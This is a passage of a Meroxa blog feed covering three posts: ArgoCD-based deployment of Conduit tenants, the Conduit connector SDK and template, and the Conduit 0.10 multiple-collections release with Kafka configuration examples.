Before we expand further, here’s a quick overview of the technologies used in this blog post:&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;ArgoCD Setup at Meroxa&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;ArgoCD&apos;s primary role in our platform is to deploy and manage thousands of distinct, “mini” Conduit platform instances, which we call &apos;tenants&apos;. This setup comprises of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Supervisor Application&lt;/strong&gt;: This is a &lt;em&gt;single&lt;/em&gt; ArgoCD application that creates and manages Meroxa tenants. This involves creation of Kubernetes namespaces and ArgoCD Applications for each tenant, supports deployment into private VPCs, and ensures cloud-agnostic deployments across AWS, Azure, or Google Cloud. It’s also capable of deploying the Conduit platform in air-gapped environments, as well as deploying tenants to different computer architectures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tenant ArgoCD Applications&lt;/strong&gt;: For each tenant on the platform, an ArgoCD application is created. The tenant ArgoCD application points to a Helm chart containing all components of the tenant platform instance, including the Conduit platform, which performs Meroxa’s core stream processing. Additionally, it encapsulates ArgoCD Applications for supporting services in the tenant namespace, such as Grafana and Loki.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/7cdcf7740375f6283918c854dc98b7a5/e8950/tenant-argocd-final.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 107%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAADOUlEQVR42oVV2Y7bRhDk//+PEb84QWxvgsB5sA3DcBbY1bWSKFG8RM5JzlSqh+Tu+oIHapCY6emuqu6msqZpsVptURQlHg457g4ldvWIsh+wrR0+XQwKO0CWtQHK0FyAHWPaG11E20VUOsKGiKwsK7y+eYs3Nzd49fsf+PfTCn/+p/Hb5wavVh1erK+4bd10mUE0g3ZmhPEB/RAQuPf5XuHLTmOkT3YtAt6/Nnj3t8Jf7xT+YbCX71u8uesTEseLXtDw54imUyOqboDmfkJNZE2tyEhD0S9TPFzfdtisDNYHi23hkDcDHiqHth9TUD8j6xms60iZ7zVRdoLQR2xPAZtyhGfWrFcDeuuSJi5MusgabEyaebK1V4O60kQWYJhkoG9rR2o7Jp+7dYn7QwMXGXAkck/NxWmJN1CMTo/UKOLK4uSbLfabDQoWKU71Ae8izJRPZ4sDde6FMr5ZIrwjjTgHV53Hntl3ZYvySiZ9wMDMIgMlJZMBH25bfLxv4eOILDLNQCSeTiPNqJDQinlGpRpw7RWma0EwsDz3w1NARQb73RG7Y05GDDh4XugNA3XoLHhx0sgNk6bGRBwfcux5wTABQTBJeJTH8/xcBeTUV0sfDkRQnk645HtWlSj97Dk/BPH51GFfXlNVF1ks/aY+BL6se9zu1dSHXlqg1ig7kxpWtSFpqIlCs2JGKDc1TFvBPNN66QcB1DQKNVky1NdFESfHdgnhaU+z9445i1LURDjiZyvO9l2Vg+hm5+mgi6OufdWjvXJywk+CibZzW2Q/dkAKaFJwoMpzXE5HWPx6Zc+DPLdlWepa1yZpbMfwjW+c7elONlCXy6WaIMdnaj9mSo3KGVY4Hk+oquY7v5g+Y5xkJsy842idzhx8BaV1Mstudt7D05xzbA12QtWiKMt0Lr7GmHQmPot+Mc0ynRU/PeP8bRPTyiSz7Bl5Oo6X1haGJucTaM4672lt0nsMMVmiXBQXbg5P5edBIAWhGcLXpY1CnxVvOI4/psxPzVHmsFcM0Ccai3Tyt1DVNZTSieKyJOCZIGRf7ixJE2WhoEhLNj2zOOsfAwpNxz2RRZ5LNUV30Vl6Vp5yvpz9D6CjZB8eJGP9AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Diagram of a Tenant ArgoCD Application. Note that there is a hierarchy, where the Conduit Platform is a child App of the Tenant ArgoCD App.&quot;
        title=&quot;&quot;
        src=&quot;/static/7cdcf7740375f6283918c854dc98b7a5/5a190/tenant-argocd-final.png&quot;
        srcset=&quot;/static/7cdcf7740375f6283918c854dc98b7a5/772e8/tenant-argocd-final.png 200w,
/static/7cdcf7740375f6283918c854dc98b7a5/e17e5/tenant-argocd-final.png 400w,
/static/7cdcf7740375f6283918c854dc98b7a5/5a190/tenant-argocd-final.png 800w,
/static/7cdcf7740375f6283918c854dc98b7a5/c1b63/tenant-argocd-final.png 1200w,
/static/7cdcf7740375f6283918c854dc98b7a5/29007/tenant-argocd-final.png 1600w,
/static/7cdcf7740375f6283918c854dc98b7a5/e8950/tenant-argocd-final.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Diagram of a Tenant ArgoCD Application. Note that there is a hierarchy, where the Conduit Platform is a child App of the Tenant ArgoCD App.&lt;/p&gt;
&lt;p&gt;This encapsulation provides us simplicity for managing all of these Kubernetes resources - &lt;code class=&quot;language-text&quot;&gt;Deployments&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Pods&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Ingress&lt;/code&gt;, etc. All the setup application needs to do is invoke the Kubernetes API once to create the Tenant ArgoCD Application, which is provided as a &lt;a href=&quot;https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/&quot;&gt;Kubernetes Custom Resource&lt;/a&gt; by ArgoCD.&lt;/p&gt;
&lt;p&gt;The tenant ArgoCD Applications have the &lt;code class=&quot;language-text&quot;&gt;repo&lt;/code&gt; pointed to the GitHub repository hosting the Conduit Platform code. The &lt;code class=&quot;language-text&quot;&gt;path&lt;/code&gt; is pointed to a directory containing the helm chart for the specific environment - we’ll dig into that nuance &lt;a href=&quot;https://www.notion.so/Simplifying-Kubernetes-Deployments-with-ArgoCD-0f164a4b8dcf41c2a08507676ab3c2d7?pvs=21&quot;&gt;further down below.&lt;/a&gt; Lastly, the &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt; is pointed to &lt;code class=&quot;language-text&quot;&gt;HEAD&lt;/code&gt;, so we can ensure the helm chart from the latest commit will be reflected. ArgoCD will automatically sync.&lt;/p&gt;
&lt;p&gt;Once the synchronization process runs, the ArgoCD controller will be responsible for reconciling the desired state from the helm chart into the actual state of Kubernetes resources - including the Conduit Platform’s &lt;code class=&quot;language-text&quot;&gt;Pod&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Deployment&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;Ingress&lt;/code&gt;. For more information on the sync process in ArgoCD, check out &lt;a href=&quot;https://argo-cd.readthedocs.io/en/stable/core_concepts/&quot;&gt;the documentation here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;PR → Staging → Production&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Our deployment workflow is designed to keep the deployment process reliable and efficient. Here’s how we navigate from staging to production using ArgoCD:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Staging CI Workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The journey begins when a PR is merged into the main branch, triggering our staging CI GitHub workflow. This performs the following:&lt;/p&gt;
&lt;p&gt;Example &lt;code class=&quot;language-text&quot;&gt;values-images.yaml&lt;/code&gt; file, containing a docker image tag for the conduit platform:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;imageTag&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; av8344892b23h281h5c50e863a93c2b231hd8ce3&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;strong&gt;Production CI Workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The production workflow mostly following the staging process, but with two key differences:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Promote The Staging Chart + Docker Image:&lt;/strong&gt; Instead of building a new image for production, the production workflow promotes the changes from the &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;staging/&lt;/code&gt;&lt;/strong&gt; directory to the &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;production/&lt;/code&gt;&lt;/strong&gt; directory.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Manual PR Approval for Production&lt;/strong&gt;: Unlike staging, the PR for production deployment requires manual approval. This step ensures an extra layer of scrutiny and control before changes impact our production environment.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;gitGraph LR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
     checkout main
     commit
     commit
     branch samir/add&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;new&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;migration
     &lt;span class=&quot;token key atrule&quot;&gt;commit id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;samir adds new migration&quot;&lt;/span&gt;
     checkout main
     merge samir/add&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;new&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;migration id&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;1j38h72&quot;&lt;/span&gt;
     branch automated&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;files&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;updates&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;1j38h72
     &lt;span class=&quot;token key atrule&quot;&gt;commit id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;[Automated] update staging directory values files to &apos;1j38h72&apos;&quot;&lt;/span&gt;
     checkout main
     merge automated&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;files&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;updates&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;1j38h72 id&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;j81h78t&quot;&lt;/span&gt;
     branch automated&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;files&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;updates&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;prod&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;1j38h72
     &lt;span class=&quot;token key atrule&quot;&gt;commit id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;[Automated] update production directory values files to &apos;1j38h72&apos;&quot;&lt;/span&gt;
     checkout main
     merge automated&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;files&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;updates&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;prod&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;1j38h72&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;mermaid&quot;&gt;&lt;pre class=&quot;language-mermaid&quot;&gt;&lt;code class=&quot;language-mermaid&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;gitGraph&lt;/span&gt; LR&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
     checkout main
     commit
     commit
     branch samir/add-new-migration
     commit id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;samir adds new migration&quot;&lt;/span&gt;
     checkout main
     merge samir/add-new-migration id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;1j38h72&quot;&lt;/span&gt;
     branch automated-value-files-updates-1j38h72
     commit id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;[Automated] update staging directory values files to &apos;1j38h72&apos;&quot;&lt;/span&gt;
     checkout main
     merge automated-value-files-updates-1j38h72 id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;j81h78t&quot;&lt;/span&gt;
     branch automated-value-files-updates-prod-1j38h72
     commit id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;[Automated] update production directory values files to &apos;1j38h72&apos;&quot;&lt;/span&gt;
     checkout main
     merge automated-value-files-updates-prod-1j38h72&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Challenges and Learnings&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Our introduction to ArgoCD was a bit of a learning curve. Here are some challenges we faced and the insights we gained:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Managing Image Tags and PRs&lt;/strong&gt;: Initially, pinning image tags with environment-specific deployments was tricky. We learned to simply point &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt; to &lt;code class=&quot;language-text&quot;&gt;HEAD&lt;/code&gt;, and duplicate charts per environment in different directories. Here were the alternatives we avoided:&lt;/li&gt;
&lt;li&gt;At first, we were inclined to point &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt;s directly to specific commits, but quickly this proved to be problematic, as changes to helm charts and values could bypass staging and land directly into production.&lt;/li&gt;
&lt;li&gt;We also explored tracking separate &lt;code class=&quot;language-text&quot;&gt;staging&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;production&lt;/code&gt; branches, but decided against it to reduce complexity and potential conflicts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated PR Management&lt;/strong&gt;: Automated PRs, especially for production, can create a lot of noise and can quickly pile up if the team is not paying attention to them. This is a drawback of the approach - we decided it was worth the tradeoff for the deployment simplicity.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File Protection&lt;/strong&gt;: We implemented PR checks to protect &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;values-images.yaml&lt;/code&gt;&lt;/strong&gt; files and helm charts in staging and production directories from manual alterations, for integrity of the deployment process.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Future Improvements&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Looking forward, we aim to improvement our ArgoCD setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Slack Notifications&lt;/strong&gt;: To enhance our monitoring, we&apos;re considering integrating Slack notifications to alert the team when syncs in Staging and Production are complete.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-Cluster Capabilities&lt;/strong&gt;: Utilizing ArgoCD&apos;s multi-cluster feature could be useful, especially for managing multiple production clusters in different regions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scaling ArgoCD Controllers&lt;/strong&gt;: To improve reliability, we’re working on scaling up the number of ArgoCD controllers, in case of pod failures.
ArgoCD has been a game-changer for us at Meroxa. It has streamlined our deployment process, making it more efficient and scalable. We&apos;re excited to dive deeper into ArgoCD and fully leverage its capabilities.
Have you thought about deploying applications with ArgoCD? Are you working on stream processing or data engineering problems? Join &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;our community&lt;/a&gt; and chat with us.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Simplifying Data Integration: Unleashing the Power of Conduit SDK and Connector Template]]></title><description><![CDATA[Explore the power of Conduit to create custom connectors tailored to your specific data integration needs. Learn how to use the Conduit SDK for enhanced data management and discover a world of possibilities in streamlining your data workflows. Start building your custom connector today!]]></description><link>https://meroxa.com/blog/crafting-custom-conduit-connectors-with-ease-a-step-by-step-guide</link><guid isPermaLink="false">https://meroxa.com/blog/crafting-custom-conduit-connectors-with-ease-a-step-by-step-guide</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Wed, 08 May 2024 16:22:50 GMT</pubDate><content:encoded>&lt;h3&gt;Introducing Conduit SDK&lt;/h3&gt;
&lt;p&gt;Conduit&apos;s SDK is designed to facilitate the creation of connectors in any programming language that supports gRPC, with a particular emphasis on Go. This SDK simplifies the process of building connectors, offering developers the tools necessary to integrate seamlessly with Conduit’s data streaming platform.&lt;/p&gt;
&lt;h3&gt;Leveraging the Conduit Connector Template&lt;/h3&gt;
&lt;p&gt;For those looking to jumpstart the development of a Conduit connector, the Conduit Connector Template is an invaluable resource. This template provides a foundational project structure, complete with essential utilities like GitHub Actions for CI/CD processes and a Makefile for routine tasks. It includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Skeleton code for the connector&apos;s configuration, source and destination&lt;/li&gt;
&lt;li&gt;Example unit tests&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/Makefile&quot;&gt;Makefile&lt;/a&gt; with commonly used targets&lt;/li&gt;
&lt;li&gt;A GitHub workflow to &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/build.yml&quot;&gt;build the code and run the tests&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A GitHub workflow to &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/lint.yml&quot;&gt;run a pre-configured set of linters&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A GitHub workflow which &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/release.yml&quot;&gt;automatically creates a release&lt;/a&gt; once a tag is pushed&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/dependabot.yml&quot;&gt;dependabot setup&lt;/a&gt; which checks your dependencies for available updates and &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/dependabot-auto-merge-go.yml&quot;&gt;merges minor version upgrades&lt;/a&gt; automatically&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/ISSUE_TEMPLATE&quot;&gt;Issue&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/pull_request_template.md&quot;&gt;PR templates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/README_TEMPLATE.md&quot;&gt;README template&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Developing Your Connector&lt;/h3&gt;
&lt;p&gt;Whether creating a source or destination connector, Conduit’s tools support you every step of the way. The process involves:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cloning the template and setting up the initial configuration.&lt;/li&gt;
&lt;li&gt;Customizing the source and destination logic to fit your specific data integration needs.&lt;/li&gt;
&lt;li&gt;Utilizing the &lt;code class=&quot;language-text&quot;&gt;paramgen&lt;/code&gt; tool to generate configuration parameter mappings automatically.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Practical Steps to Implementation&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Initialization&lt;/strong&gt;: Start by using the template directly from GitHub to ensure all configurations are set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Customization&lt;/strong&gt;: Adapt the provided skeleton code to meet the specific requirements of your data source or destination.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Testing and Deployment&lt;/strong&gt;: Utilize the built-in testing framework and CI/CD pipelines to ensure your connector is robust and ready for deployment.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By integrating Conduit’s SDK and leveraging the provided templates, developers can significantly reduce the complexity and time required to bring a functional data connector to life.&lt;/p&gt;
&lt;p&gt;For those interested in diving deeper into the capabilities of &lt;a href=&quot;https://conduit.io/docs/connectors/building-connectors/conduit-sdk&quot;&gt;Conduit SDK&lt;/a&gt; and how you can efficiently build and deploy your own connectors, &lt;a href=&quot;https://github.com/ConduitIO&quot;&gt;read the full documentation here&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.10 comes with Multiple collections support]]></title><description><![CDATA[Explore the new features and enhancements in Conduit version 0.10, designed to streamline your data integration processes. Discover how our latest update can help improve efficiency, security, and performance for your data operations. Upgrade today and transform how you manage data with Conduit 0.10]]></description><link>https://meroxa.com/blog/conduit-0.10-comes-with-multiple-collections-support</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.10-comes-with-multiple-collections-support</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Mon, 29 Apr 2024 22:37:15 GMT</pubDate><content:encoded>&lt;p&gt;We’re happy to announce another release of our open-source data integration tool Conduit: &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.10.0&quot;&gt;0.10&lt;/a&gt;. This one comes only a month after our last release. We thought the new native support for multiple collections was so important that we wanted to release it to our users as quickly as possible.&lt;/p&gt;
&lt;h2&gt;Multiple collections support&lt;/h2&gt;
&lt;p&gt;We take our users&apos; feedback very seriously, and something we kept hearing was the need to have the ability to connect and integrate multiple data collections simultaneously. While this could be accomplished in some cases by creating multiple pipelines, it was far from ideal and not very scalable.&lt;/p&gt;
&lt;p&gt;What do we mean by “collections”? It depends on the resource that Conduit is interacting with. In a database, a collection is a table, in Kafka it’s a topic, in Elasticsearch it’s an index. We use “collection” as the catch-all term for structures that contain a group of related records.&lt;/p&gt;
&lt;p&gt;With this latest release, we believe it will be easier for connector developers to expand their functionality and add support for multiple collections.&lt;/p&gt;
&lt;p&gt;To facilitate connectivity between connectors, we included a new metadata field named &lt;a href=&quot;https://conduit.io/docs/features/opencdc-record#opencdccollection&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;opencdc.collection&lt;/code&gt;&lt;/a&gt; to indicate the collection from which a record originated. For example, if a record was read from a topic named &lt;code class=&quot;language-text&quot;&gt;users&lt;/code&gt;, the &lt;a href=&quot;https://conduit.io/docs/features/opencdc-record&quot;&gt;OpenCDC&lt;/a&gt; record would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;operation&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;metadata&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;opencdc.collection&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;opencdc.readAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1663858188836816000&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;opencdc.version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;conduit.source.plugin.name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;builtin:kafka&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;conduit.source.plugin.version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v0.8.0&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  ...
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The goal of this feature is to make it easy to route records in a pipeline. What in the past would have taken several pipelines, can now be a single pipeline. However, that’s not the only way to route records in Conduit. Read more about other ways to &lt;a href=&quot;https://conduit.io/docs/features/record-routing/&quot;&gt;route records in Conduit&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Connectors with support for multiple collections&lt;/h2&gt;
&lt;p&gt;To demonstrate the capability of having multiple collections in Conduit, we decided to start with some of our built-in connectors, which are included as part of the Conduit binary.&lt;/p&gt;
&lt;h3&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;Kafka connector&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This connector now supports the ability to read and write to multiple topics. When configuring &lt;strong&gt;Kafka as a source&lt;/strong&gt;, you can make use of the &lt;code class=&quot;language-text&quot;&gt;topics&lt;/code&gt; configuration option to include a list of Kafka topics from which records will be read:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Read records from topic1 and topic2&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; topic1&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;topic2
      &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When configuring &lt;strong&gt;Kafka as a destination&lt;/strong&gt;, you can specify a target topic based on data taken from the record being processed. The default value of the &lt;code class=&quot;language-text&quot;&gt;topic&lt;/code&gt; parameter is the &lt;a href=&quot;https://pkg.go.dev/text/template&quot;&gt;Go template&lt;/a&gt; &lt;code class=&quot;language-text&quot;&gt;{{ index .Metadata &quot;opencdc.collection&quot; }}&lt;/code&gt;, which means that records will be routed to the topic based on the collection they come from. You can change the parameter to take data from a different field or use a static topic.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
